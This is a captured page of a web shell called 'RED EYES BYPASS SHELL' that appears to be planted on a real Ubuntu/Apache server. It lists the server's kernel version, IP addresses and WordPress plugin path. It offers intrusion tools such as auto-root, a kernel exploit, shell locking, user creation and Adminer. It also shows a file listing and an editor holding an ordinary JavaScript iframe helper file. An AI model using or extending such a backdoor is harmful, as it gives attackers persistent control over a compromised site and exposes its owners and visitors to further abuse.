Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
monarch /
core /
admin /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
checkbox.js
2.62
KB
-rwxr-xr-x
colorpicker.js
16.58
KB
-rwxr-xr-x
common.js
1.31
KB
-rwxr-xr-x
compatibility-warning.js
1.83
KB
-rwxr-xr-x
core.js
5.56
KB
-rwxr-xr-x
es6-promise.auto.min.js
6.66
KB
-rwxr-xr-x
eye.js
935
B
-rwxr-xr-x
frame-helpers.js
1.04
KB
-rwxr-xr-x
functions-init.js
8.72
KB
-rwxr-xr-x
page-resource-fallback.js
854
B
-rwxr-xr-x
page-resource-fallback.min.js
293
B
-rwxr-xr-x
popper.min.js
16.91
KB
-rwxr-xr-x
portability.js
23.41
KB
-rwxr-xr-x
react-dom.production.min.js
123.06
KB
-rwxr-xr-x
react.production.min.js
13.86
KB
-rwxr-xr-x
recaptcha.js
1.66
KB
-rwxr-xr-x
support-center.js
19.29
KB
-rwxr-xr-x
tippy.min.js
22.71
KB
-rwxr-xr-x
version-rollback.js
2.41
KB
-rwxr-xr-x
wp-color-picker-alpha.min.js
8.32
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : frame-helpers.js
/* ,-,- / / | ,-' _/ / / (-_ _,-' `Z_/ "#: ,-'_,-. \ _ #' _(_-'_()\ \" | ,--_,--' | / "" L-'\ \,--^---v--v-._ / \ | \_________________,-' | \ \ \ NOTE: The code in this file will be executed multiple times! */ let top_window = window; let is_iframe = false; let top; try { // Have to access top window's prop (document) to trigger same-origin DOMException // so we can catch it and act accordingly. top = window.top.document ? window.top : false; } catch(e) { // Can't access top, it means we're inside a different domain iframe. top = false; } if (top && top.__Cypress__) { if (window.parent === top) { top_window = window; is_iframe = false; } else { top_window = window.parent; is_iframe = true; } } else if (top) { top_window = top; is_iframe = top !== window.self; } export { top_window, is_iframe, };
Close